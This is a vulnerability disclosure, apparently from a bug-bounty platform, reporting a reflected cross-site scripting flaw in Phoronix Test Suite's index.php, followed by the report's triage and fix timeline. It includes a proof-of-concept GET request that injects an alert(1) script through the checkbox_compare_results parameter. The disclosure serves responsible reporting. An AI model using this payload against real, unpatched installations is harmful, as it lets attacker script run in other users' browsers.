Cross-site Scripting (XSS) - Reflected in phoronix-test-suite/phoronix-test-suite

Valid

Reported on

Jun 25th 2022


Description

Hi, i found a Reflected XSS vulnerability (GET request in /index.php ) in phoronix test suite, Results tab. Line 45 of index.php sends unvalidated data to a web browser, which can result in the browser executing malicious code.

Proof of Concept

GET /index.php?checkbox_compare_results[]=%22;alert(1);%22 HTTP/1.1
Host: localhost:8670
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=do8d0t932flbqqlmc9tj6hcjdk
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

Impact

This vulnerability is capable of Reflected XSS

We are processing your report and will contact the phoronix-test-suite team within 24 hours. a month ago
trongkykma modified the report
a month ago
trongkykma modified the report
a month ago
We have contacted a member of the phoronix-test-suite team and are waiting to hear back a month ago
phoronix-test-suite/phoronix-test-suite maintainer modified the Severity from High to Low a month ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
phoronix-test-suite/phoronix-test-suite maintainer validated this vulnerability a month ago
trongkykma has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
phoronix-test-suite/phoronix-test-suite maintainer confirmed that a fix has been merged on 61e004 a month ago
The fix bounty has been dropped
to join this conversation